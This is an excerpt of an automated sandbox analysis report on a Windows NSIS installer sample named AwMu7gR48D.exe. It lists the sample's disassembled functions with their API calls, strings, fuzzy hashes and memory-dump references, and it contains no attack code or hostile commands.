Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 86462296798bcc5c7116dc0b8927a48604f8bac83b6720eb84ded3fe255ec0fc
Instruction ID: 8315facf8ced128c6c50566814b57074d619fda0e5ca52ae4c33e0c7423f4127
Opcode Fuzzy Hash: 86462296798bcc5c7116dc0b8927a48604f8bac83b6720eb84ded3fe255ec0fc
Instruction Fuzzy Hash: E8F0ECB2704111AFD710EB749D49AFE7778DB11324F20057BE645F20C1D6B88A45DB2A

Function 00404139 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C4
GetDlgItem.USER32(00000000,000003E8), ref: 004041D8
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F6
GetSysColor.USER32(?), ref: 00404207
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404216
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404225
lstrlenA.KERNEL32(?), ref: 00404228
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404237
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040424C
GetDlgItem.USER32(?,0000040A), ref: 004042AE
SendMessageA.USER32(00000000), ref: 004042B1
GetDlgItem.USER32(?,000003E8), ref: 004042DC
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040431C
LoadCursorA.USER32(00000000,00007F02), ref: 0040432B
SetCursor.USER32(00000000), ref: 00404334
LoadCursorA.USER32(00000000,00007F00), ref: 0040434A
SetCursor.USER32(00000000), ref: 0040434D
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404379
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040438D

Strings

N, xrefs: 004042CA
: Completed, xrefs: 00404307

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: feecafc40baf01a00ddfc5a4ad2d6f47f6ba1c3b7388df2095feb28ad013f924
Instruction ID: 7162b40555158b22622c6e9d00efc6f9eaf6d98589edfbec15a783eb0e256f30
Opcode Fuzzy Hash: feecafc40baf01a00ddfc5a4ad2d6f47f6ba1c3b7388df2095feb28ad013f924
Instruction Fuzzy Hash: 4E61A4B1A40205BFDB109F61CD45F6A7B69FB84704F00803AFB05BA2D1C7B8A951CF99

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction ID: d756f8073455ec7f94eaaa006bac723f94b68f9cc4de0a6a70f3062e944f429a
Opcode Fuzzy Hash: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction Fuzzy Hash: 6E419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Function 00405B9E Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D2F,?,?), ref: 00405BCF
GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405BD8

Part of subcall function 00405A2D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A3D
Part of subcall function 00405A2D: lstrlenA.KERNEL32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A6F

GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405BF5
wsprintfA.USER32 ref: 00405C13
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405C4E
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C5D
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C95
SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEB
GlobalFree.KERNEL32(00000000), ref: 00405CFC
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D03

Part of subcall function 00405AC8: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00405ACC
Part of subcall function 00405AC8: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE

Strings

[Rename], xrefs: 00405C7D, 00405C8F
%s=%s, xrefs: 00405C09

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: fa16ef9a339b69213ae22a03f48f65898cca3967a232a53d2c4426af25c81478
Instruction ID: 318577f01edad599db78de103440226658cd26d488467381f1a5ad924793321f
Opcode Fuzzy Hash: fa16ef9a339b69213ae22a03f48f65898cca3967a232a53d2c4426af25c81478
Instruction Fuzzy Hash: DC311331605B196BD2206B65AC49F6B3A6CDF45754F14053BFA01F72D2E63CAC018EBD

Function 00406199 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\AwMu7gR48D.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004061F1
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004061FE
CharNextA.USER32(?,"C:\Users\user\Desktop\AwMu7gR48D.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406203
CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406213

Strings

"C:\Users\user\Desktop\AwMu7gR48D.exe", xrefs: 004061D5
*?|<>/":, xrefs: 004061E1
C:\Users\user\AppData\Local\Temp\, xrefs: 0040619A

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\AwMu7gR48D.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-116931803
Opcode ID: cc2015c7b969e01208aad92a9e3b8c758494e26085fc8624e700c096258e22ae
Instruction ID: ca9b47fb282156c43c251839f6001ffd27a0cb8481c2ab4f175210ee2844123a
Opcode Fuzzy Hash: cc2015c7b969e01208aad92a9e3b8c758494e26085fc8624e700c096258e22ae
Instruction Fuzzy Hash: 0911046180839169FB3216244C44B7B7F898F5B760F1A44BFE8D6722C3C67C5C62866E

Function 00404057 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404074
GetSysColor.USER32(00000000), ref: 00404090
SetTextColor.GDI32(?,00000000), ref: 0040409C
SetBkMode.GDI32(?,?), ref: 004040A8
GetSysColor.USER32(?), ref: 004040BB
SetBkColor.GDI32(?,?), ref: 004040CB
DeleteObject.GDI32(?), ref: 004040E5
CreateBrushIndirect.GDI32(?), ref: 004040EF

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: becbdb48d67c78dbb8c9c091cdbe424430cb8bef044b76b3398d9101d9dbd489
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: 86215071904704ABCB219F68DD48B4BBBF8AF41714B048A29EA96B26E0C734E904CB65

Function 00404921 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040493C
GetMessagePos.USER32 ref: 00404944
ScreenToClient.USER32(?,?), ref: 0040495E
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404970
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404996

Strings

f, xrefs: 00404972

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 39a8229da7402e88b879503ea9069683dc6a956defdeaab739565ccd09fe5115
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: F3014071D00219BADB01DBA4DC85FFFBBBCAF55711F10412BBA11B61C0D7B869058BA5

Function 00402C61 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
MulDiv.KERNEL32(0007A328,00000064,0007A32C), ref: 00402CA7
wsprintfA.USER32 ref: 00402CB7
SetWindowTextA.USER32(?,?), ref: 00402CC7
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9

Strings

verifying installer: %d%%, xrefs: 00402CB1

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 8cc8d962d8a99aef7830ba12bdb56859a6c3448b551b59a443d52a8a404c13af
Instruction ID: 60d807589532a1750165d7633efe1ba379d0dd74474c58c1bab17da8cefdfa8e
Opcode Fuzzy Hash: 8cc8d962d8a99aef7830ba12bdb56859a6c3448b551b59a443d52a8a404c13af
Instruction Fuzzy Hash: DA011271944209FBEF209F60DD09EEE37A9EB04304F008039FA06B92D0D7B99995CF59

Function 00402736 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
GlobalFree.KERNEL32(?), ref: 004027E5
GlobalFree.KERNEL32(00000000), ref: 004027F8
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 3fc906cc5814f1f80ca93e9dadef5c7fad5cafe1ef7802143d47ec90486de439
Instruction ID: 6a21e90f7c3239ff032d316014871365707a2127fc9d4c87d4a28567e6836d84
Opcode Fuzzy Hash: 3fc906cc5814f1f80ca93e9dadef5c7fad5cafe1ef7802143d47ec90486de439
Instruction Fuzzy Hash: 9B21C071C00124BBCF216FA5DD89DAE7B79EF05364F14423AF914762E0C6784D008FA8

Function 00404817 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Solidariseringerne Setup: Completed,Solidariseringerne Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404732,000000DF,00000000,00000400,?), ref: 004048B5
wsprintfA.USER32 ref: 004048BD
SetDlgItemTextA.USER32(?,Solidariseringerne Setup: Completed), ref: 004048D0

Strings

%u.%u%s%s, xrefs: 0040489F
Solidariseringerne Setup: Completed, xrefs: 004048A7, 004048AC, 004048B2, 004048C6

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Solidariseringerne Setup: Completed
API String ID: 3540041739-3673876184
Opcode ID: fa3760b7cc8f97072af816aff5d6cd3f5b0d901f8ded19e577a8610c70623aa0
Instruction ID: e2544e14f383b0e553931f5ad3d2c5e69aaccc6a02b7144a1c376111f1efcf8d
Opcode Fuzzy Hash: fa3760b7cc8f97072af816aff5d6cd3f5b0d901f8ded19e577a8610c70623aa0
Instruction Fuzzy Hash: 2B11E473A041283BDB0076699C42EAF3288DB81374F254637FB65F21D1E979DC1286A8

Function 00401D95 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D98
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
ReleaseDC.USER32(?,00000000), ref: 00401DCB
CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 34073e52274d0eea5c5fbf1d3db0759766414d75607053c18096eba5d79a5540
Instruction ID: 962fd9b87f23d05f09829d6e62e81eb88b122f60c97e2af10dcf53a19e6500d2
Opcode Fuzzy Hash: 34073e52274d0eea5c5fbf1d3db0759766414d75607053c18096eba5d79a5540
Instruction Fuzzy Hash: B0015272948340AFE7006BB0AE49F997FF4A715305F108479F241B62E2C67954569F3E

Function 00401D3B Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D3F
GetClientRect.USER32(00000000,?), ref: 00401D4C
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
DeleteObject.GDI32(00000000), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 764c70fbd70d8432b47cb810857664527778e1a3b62db9879bd3831654477798
Instruction ID: e514ae104980ccf078864521baf36738fde3649283c018ed360e76dc3c34fc32
Opcode Fuzzy Hash: 764c70fbd70d8432b47cb810857664527778e1a3b62db9879bd3831654477798
Instruction Fuzzy Hash: 13F0FFB2A04115BFDB01EBA4DD88DAFBBBCEB44301B044476F605F2191C6749D018B79

Function 00401C04 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C

Strings

!, xrefs: 00401C40

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 756893ed4847bb0bd72a5117efa2a57ba430928b3e2712cee879890b773371fc
Instruction ID: 91203bd525acade81736f390ad8a27fd027b74ba1091a33c19100adfebe27d64
Opcode Fuzzy Hash: 756893ed4847bb0bd72a5117efa2a57ba430928b3e2712cee879890b773371fc
Instruction Fuzzy Hash: 6C218E71E44209BEEB159FA5D946AAD7BB0EB84304F14803EF505F61D1DA788A408F28

Function 004059B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C

Part of subcall function 00405960: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspE492.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405973
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405987

